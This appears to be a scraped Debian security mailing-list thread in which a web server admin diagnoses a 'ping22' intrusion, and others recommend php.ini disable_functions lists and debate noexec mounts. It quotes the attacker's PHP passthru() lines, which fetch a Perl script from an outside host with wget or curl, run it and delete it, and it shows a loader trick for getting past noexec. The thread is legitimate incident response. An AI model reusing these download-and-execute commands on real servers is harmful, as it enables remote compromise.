Quoting Luis Mondesi ([EMAIL PROTECTED]):
> Good one! LOL
>
> spilling ugly db*connect() errors to the world to see is not very
> secure indeed. or how about: foo() could not open /etc/my-secret-users
> file
Which is of course why you also want these in php.ini:
log_errors = On
error_log =
On 5 Jan 2008 16:33:07 GMT, Paul Hink <[EMAIL PROTECTED]> wrote:
> Thomas Hochstein <[EMAIL PROTECTED]> wrote:
>
> > Raphael Geissert schrieb:
> >
> >>> disable_functions = dl, phpinfo, system, mail, include, shell_exec,
> >>> exec,
> >>
> >> include()? I don't want to imagine how many scripts will
Thomas Hochstein <[EMAIL PROTECTED]> wrote:
> Raphael Geissert schrieb:
>
>>> disable_functions = dl, phpinfo, system, mail, include, shell_exec,
>>> exec,
>>
>> include()? I don't want to imagine how many scripts will break.
>
> A script that doesn't run is a *very* secure script.
That depends o
Raphael Geissert schrieb:
>> disable_functions = dl, phpinfo, system, mail, include, shell_exec, exec,
>
> include()? I don't want to imagine how many scripts will break.
A script that doesn't run is a *very* secure script.
-thh
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of
In article <[EMAIL PROTECTED]> you wrote:
> Ah, I see. I have never come across a program (yet) that uses it for
> shared memory. Perhaps I'm just running the wrong programs.
The program itself is not using it, its glibc2.2 which does use that (for
POSIX shm, I think not for SYSV. so its quite s
On Fri, 04 Jan 2008 22:30:18 +0100 Bernd Eckenfels <[EMAIL PROTECTED]>
wrote:
> why do you think it is named shm? it is used for shm_open and
> shm_unlink.
> (where glibc used temporary files to mmap them)
Ah, I see. I have never come across a program (yet) that uses it for
shared memory. Perha
In article <[EMAIL PROTECTED]> you wrote:
>> It is for example used to map shared memory. ...
>
> No, it is a tmpfs directory for temporary files. It has nothing to do
> with shared memory.
why do you think it is named shm? it is used for shm_open and shm_unlink.
(where glibc used temporary file
On Fri, 04 Jan 2008 08:23:45 +0100 Bernd Eckenfels <[EMAIL PROTECTED]>
wrote:
> >what kind applications are using /dev/shm? I googled
> > around,seem not find much information.
> > right now I mount i as rw,noexec,nosuid.
>
> It is for example used to map shared memory. ...
No, it is a t
Quoting Raphael Geissert ([EMAIL PROTECTED]):
> include()? I don't want to imagine how many scripts will break.
Good catch. (It was very late in my time zone. I need to review that
list.)
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL P
Rick Moen wrote:
>
> disable_functions = dl, phpinfo, system, mail, include, shell_exec, exec,
include()? I don't want to imagine how many scripts will break.
Cheers,
--
Atomo64 - Raphael
Please avoid sending me Word, PowerPoint or Excel attachments.
See http://www.gnu.org/philosophy/no-word-a
On Thu, Jan 03, 2008 at 08:55:11PM -0500, Luis Mondesi wrote:
> And besides, noexec can't even
> stop executables anyway. That's the stupidest of flags for mount:
>
> $> /lib/ld-linux.so.2 /usr/bin/printf "%s\n" foo
> foo
I think some of the newer dynamic loaders do check noexec and refuse to
cir
Quoting Javier Fernandez-Sanguino ([EMAIL PROTECTED]):
> Even better: /usr/share/doc/php5-common/examples/php.ini-paranoid
> (it includes some more functions in that definition)
Excellent. Amended to:
disable_functions = dl, phpinfo, system, mail, include, shell_exec, exec,
escapeshellarg, esc
2008/1/4, Rick Moen <[EMAIL PROTECTED]>:
> Quoting Luis Mondesi ([EMAIL PROTECTED]):
>
> > It's time to tell PHP (via php.ini) not to allow any of those
> > functions that allow executing stuff from the system (system,
> > passthru, whatever).
>
> Amen to that. Good starting point:
> disable_func
On Fri Jan 04, 2008 at 06:04:50 -0200, Felipe Figueiredo wrote:
> Anybody has a clue as to why was this default choosen, and not the safest one?
Too many broken PHP applications?
Anyway please see /usr/share/doc/php4-common/examples/ for
different examples. (Or /usr/share/doc/php5-common/e
Em Friday 04 January 2008 04:46:48 Rick Moen escreveu:
> Looking at the typical php.ini is faintly terrifying, starting with the
> almost invariably ignored warning comments at the top, saying these
> settings are for development environments only, and should never be
> exposed to public networks.
In article <[EMAIL PROTECTED]> you wrote:
> I found the issue, it is one of the php script allowing the
> remote script to run.
This is a typical Apache exploit where remote fileuploads are possible.
> passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl
> bb.txt;rm -f bb.txt*');
Quoting Luis Mondesi ([EMAIL PROTECTED]):
> It's time to tell PHP (via php.ini) not to allow any of those
> functions that allow executing stuff from the system (system,
> passthru, whatever).
Amen to that. Good starting point:
disable_functions = system, exec, passthru, popen, escapeshellcmd,
Hi Luis
You are abosulutely right!!
Just tried a test script at /tmp, it is running. So there is not
much point to mount the /tmp /dev/shm as non-exec.
My misunderstanding of non-exec has been there for a while. :(
thanks a lot.
Mike
On Jan 3, 2008 8:55 PM, Luis Mondesi <[EMAIL PR
On Jan 3, 2008 6:18 PM, Mike Wang <[EMAIL PROTECTED]> wrote:
> Hi folks
[snip]
> http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
> passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt
> > bb.txt;perl bb.txt;rm -f bb.txt*');
> passthru('id');
> ?>
>
> the /tmp wa
Hi folks
I found the issue, it is one of the php script allowing the
remote script to run.
and the remote script is something like:
http://www.radiovirtual.org/bb.txt;perl
bb.txt;rm -f bb.txt*');
passthru('cd /tmp;curl -o bb.txt
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f
Hi Luis:
thanks.
>
> Did you check to see whether /usr/sbin/apache2 was modified? Or was it
> only the running process that had somehow been stack-overflow'd?
>
I checked the apache using debsums seems ok.
shopping:/usr/sbin# debsums apache2-mpm-prefork
/usr/sbin/apache2
OK
/usr
On Jan 1, 2008 7:10 PM, Mike Wang <[EMAIL PROTECTED]> wrote:
> Hi Jan
> thanks a lot. Happy new year to all!
Happy new year to all as well!
> I checked cron/at job, nothing related to ping22.
>
> And I checked my previous kill -9 ( see the previous post), it was
> generated like th
Hi Jan
thanks a lot. Happy new year to all!
I checked cron/at job, nothing related to ping22.
And I checked my previous kill -9 ( see the previous post), it was
generated like the following:
shopping:~# ps -ef | grep ping
www-data 6455 1 29 20:53 ?00:07:53 ping222x
sh
Hello,
Am Montag, 31. Dezember 2007 schrieb Mike Wang:
> hi
> Now this ping2 comes back, this time as ping222x. Yah it must come in
> by exploiting perl or php cgi. the running user is www-data.
>
This implies some things (likely):
1. The system (as whole), has not been comprimised. All corr
hi
Now this ping2 comes back, this time as ping222x. Yah it must come in
by exploiting perl or php cgi. the running user is www-data.
shopping:~# ps -ef | grep ping
www-data 766 1 31 19:35 ?00:24:46 ping222x
root 6419 31632 0 20:53 pts/100:00:00 grep ping
shopping:~# k
In article <[EMAIL PROTECTED]> you wrote:
> www-data 16848 1 14 14:01 ?00:06:07 ping22
Looks like it is started from Apache, most likely a CGI. Have a look at CWD
of that process or look into the access log.
Gruss
Bernd
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject o
On Sun, Dec 30, 2007 at 02:59:33PM -0500, Mike Wang wrote:
> Hi
> Recently one of my web server was invaded by something called ping22.
> it obviously exploited some perl cgi or php holes on this apache2 server.
> But I do not how it is get exploited.
>
> (1) tried to kill -9 it, it is resp
Hi Edwin
Sorry I forget to reply-all. thanks a lot for the detailed
information.
chkrootkit/rkhunter seems ok, only three of them not ok:
shopping:/proc# chkrootkit
shopping:/proc# rkhunter --checkall --skip-keypress
* Application version scan
- Exim MTA 3.36
Mike Wang wrote:
> Hi
> Recently one of my web server was invaded by something called
> ping22. it obviously exploited some perl cgi or php holes on this
> apache2 server. But I do not how it is get exploited.
>
> (1) tried to kill -9 it, it is respawn again automatically.
>
respawn by who
Hi
Recently one of my web server was invaded by something called ping22.
it obviously exploited some perl cgi or php holes on this apache2 server.
But I do not how it is get exploited.
(1) tried to kill -9 it, it is respawn again automatically.
# ps -ef | grep ping22
www-data 16848 1 1
30 matches
Mail list logo
